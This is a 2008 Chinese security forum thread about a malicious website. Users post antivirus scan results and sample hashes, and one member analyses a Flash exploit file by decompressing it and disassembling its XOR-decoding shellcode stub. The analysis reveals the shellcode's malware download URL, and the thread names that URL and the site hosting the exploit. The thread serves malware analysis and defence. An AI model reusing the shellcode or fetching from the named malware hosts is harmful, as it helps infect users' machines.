毒站一个----------------------------------

qigang

瑞星病毒查杀结果报告

清除病毒种类列表：

病毒： Trojan.Win32.Undef.igb   

MAC 地址：00:11:5B:F3:6D:69

用户来源：互联网

软件版本：20.50.02

冷冷

F7A3F36B2E89B6B6B08C3EC621DBB279  cc.exe
F7A3F36B2E89B6B6B08C3EC621DBB279  ss.exe
F7A3F36B2E89B6B6B08C3EC621DBB279  xl.exe
F7A3F36B2E89B6B6B08C3EC621DBB279  lz.exe
F7A3F36B2E89B6B6B08C3EC621DBB279  x.exe

allinwonderi

[Found possible security risk]         <W32/Heuristic-KPP!Eldorado (not disinfectable)>        C:\Documents and Settings\All Users\Documents\Test\virus.rar->bd.cab->x.exe->(UPX)
[Found possible security risk]         <W32/Heuristic-KPP!Eldorado (not disinfectable)>        C:\Documents and Settings\All Users\Documents\Test\virus.rar->lz.exe->(UPX)
[Found possible security risk]         <W32/Heuristic-KPP!Eldorado (not disinfectable)>        C:\Documents and Settings\All Users\Documents\Test\virus.rar->xl.exe->(UPX)
[Found possible security risk]         <W32/Heuristic-KPP!Eldorado (not disinfectable)>        C:\Documents and Settings\All Users\Documents\Test\virus.rar->x.exe->(UPX)
[Found possible security risk]         <W32/Heuristic-KPP!Eldorado (not disinfectable)>        C:\Documents and Settings\All Users\Documents\Test\virus.rar->cc.exe->(UPX)
[Found possible security risk]         <W32/Heuristic-KPP!Eldorado (not disinfectable)>        C:\Documents and Settings\All Users\Documents\Test\virus.rar->ss.exe->(UPX)

---------------------------------------------------------------------
Scan ended:        2008-6-23, 21:36:40
Duration:        0:00:02

Scan result:

Scanned files:                 6
Infected objects:         6
Disinfected objects:         0
Quarantined files:         0
---------------------------------------------------------------------

轩辕小聪

以http://aaw79.cn/wm/i115.swf为例。

i115.swf文件头部8个字节，格式是这样的：
+00 标志1："C"或"F"。F代表内容未经压缩，C则代表经过压缩
+01 标志2：始终为"W"
+02 标志3：始终为"S"
+03 版本：一个字节的整数表示，如0x06表示SWF 06
+04 FileLength: DWORD值，表示整个文件的大小。对于经压缩的文件，表示的是解压后的大小。

只有通过找到并调试该文件中包含的shellcode代码，才能得到该网马下载的病毒URL地址（当然你可以用有漏洞的系统，然后用HIPS等软件监视，然后一头冲进毒网里，这个方法不在我们的讨论范围）。

此时，对于flash漏洞利用文件的解密，我们特别要注意第一个字节"C“或"F"。
目前网络上流行的flash漏洞利用文件有两种，一种是"FWS"开头的未压缩文件，一种是"CWS"开头的经过压缩的文件。
对于前者，由于数据未经压缩，可直接从其数据中找到shellcode代码。一个这样的文件中的shellcode的分析，可见我之前的帖子flash漏洞所用shellcode的分析。
而对于后者，就必须先把经压缩的数据解压，才能从中找shellcode。i115.swf恰属于这种情况。

Adobe公司公开的"SWF and FLV File Format Specification Version 9"一文对这部分格式有如下描述：

CWS indicates that the entire file after the first 8 bytes (that is, after the FileLength field) was compressed by using the ZLIB open standard. The data format that the ZLIB library uses is described by Request for Comments (RFCs) documents 1950 to 1952. CWS file compression is permitted in SWF 6 or later only.

即说明了，CWS的开头意味着开始8字节之后的内容，都是被以ZLIB库的标准压缩的。
因此，需要利用ZLIB库的相应函数对其进行解压缩，从而得到原始数据，才能提取其中的shellcode代码进行调试。
flashplayer自己读取.swf文件的时候也要有这么一个过程。同样的，网上的flash解压缩的原理，也就是这样。

ZLIB的库网上有很多，包括不同语言的。
这里我使用的是http://www.base2ti.com/所提供的DelphiZlib，使用其中ZlibEx单元的ZDecompressStream方法，进行解压缩。

解压缩得到的内容，另存为i115u.bin，附在附件。

接下来就容易了，找到i115u.bin中shellcode的位置，起始位置在偏移0xEB处，开头两个字节是EB16
之后植入文件，用OD调试做分析，如下：

00407000 > /EB 16           jmp     short 00407018
00407002   |5B              pop     ebx
00407003   |33D2            xor     edx, edx
00407005   |66:B8 5907      mov     ax, 759
00407009   |66:310453       xor     word ptr [ebx+edx*2], ax
0040700D   |42              inc     edx
0040700E   |40              inc     eax
0040700F   |66:81FA 6401    cmp     dx, 164
00407014  ^|7C F3           jl      short 00407009
00407016   |EB 05           jmp     short 0040701D
00407018   \E8 E5FFFFFF     call    00407002
0040701D    B0 62           mov     al, 62                           ; 在这里按一下F4，运行到此处

在上面最后一句代码上按下F4，shellcode的xor解密过程就完成了。这时我们就可以在下面找到病毒的URL地址：

004072C0  68 74 74 70 3A 2F 2F 31 36 33 68 6B 68 6B 2E 63  http://163hkhk.c
004072D0  6E 2F 78 7A 2F 78 2E 65 78 65 00 00 00 00 00 00  n/xz/x.exe......

即下载的病毒URL地址是http://163hkhk.cn/xz/x.exe

此shellcode的行为，仍然跟我之前在flash漏洞所用shellcode的分析中提到的是基本一致的（把时间限制的几行给去掉了），可见其实是换汤不换药，就是压缩了一下而已。

附件包括原文件i115.swf，以及其8字节后的内容解压出来的结果i115.bin

本帖卡饭首发，给大家个见面礼

The EQs

[:26:] [:26:] [:26:] 我没看错吧。。。小葱也来了。。。。。估计456得天天PM你了。。。

魔法学徒

我说你开口要了一次生成器，然后一晚上不说话，原来跑这里来了

The EQs

霏凡和JM的人都来了。。。。很热闹。。。。

轩辕小聪

要生成器本来是想逆一下看看生成器是怎么生成利用文件的，自然能找到读取方法。但是搜到的都是0x4f.cn出的那个生成器，生成的都是之前分析过的未经压缩的.swf
看了adobe那篇格式说明，又搜flash解压缩的小软件，也没解出来（难道是因为这.swf本身就是畸形的缘故？），另外看雪工具页面上的两个flash反编译的软件也早试过，读这种畸形的也会出错。想起写Script Decoder的时候用过DelphiZlib的库来支持gzip格式压缩的源文件，于是回到宿舍就自己写个小程序解压出来，还真成功了

[ 本帖最后由 轩辕小聪 于 2008-6-24 02:08 编辑 ]